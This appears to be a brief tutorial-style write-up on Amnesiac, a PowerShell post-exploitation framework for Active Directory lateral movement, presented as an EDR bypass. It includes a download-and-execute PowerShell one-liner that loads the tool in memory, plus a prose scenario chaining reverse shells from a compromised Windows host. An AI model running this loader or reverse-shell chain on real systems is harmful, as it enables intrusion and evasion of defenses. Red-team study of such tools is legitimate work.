Amnesiac - EDR Bypass

Introduction

Amnesiac is a post-exploitation framework designed to assist with lateral movement within active directory environments.

Amnesiac is being developed to bridge a gap on Windows OS, where post-exploitation frameworks are not readily available unless explicitly installed. In fact, it is entirely written in PowerShell, and can be loaded and executed in memory, just like any other PowerShell script.

Load and Run

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac

Attack Map

Windows Victim Machine --> Kali Linux (Attacker's Machine)
    [Reverse Shell Connection]

Kali Linux (Attacker's Machine) --> Windows Attack Machine (Amnesiac Server)
    [Generate Listener Payload]

Windows Victim Machine --> Windows Attack Machine (Amnesiac Server)
    [New Reverse Shell Connection]

Attack Scenario

The attack scenario involves a post-exploitation phase:

1. The attacker already has access to the victim machine, which is a Windows system.

2. The attacker is using a Kali Linux machine as the primary attack machine.

3. Another Windows machine is utilized by the attacker to generate a payload listener using the tool Amnesiac.

4. The Amnesiac server runs on this Windows attack machine and generates a listener payload for the already compromised victim machine.

5. The attacker pastes the generated payload into the reverse shell session on the Kali Linux machine.

6. As a result, the attacker establishes a new session on the Windows attack machine through the reverse shell connection from the victim machine.

REFERENCES

• https://leo4j.gitbook.io/amnesiac

• https://www.youtube.com/watch?v=btAUBgeUiAg&ab_channel=CyberAttack%26Defense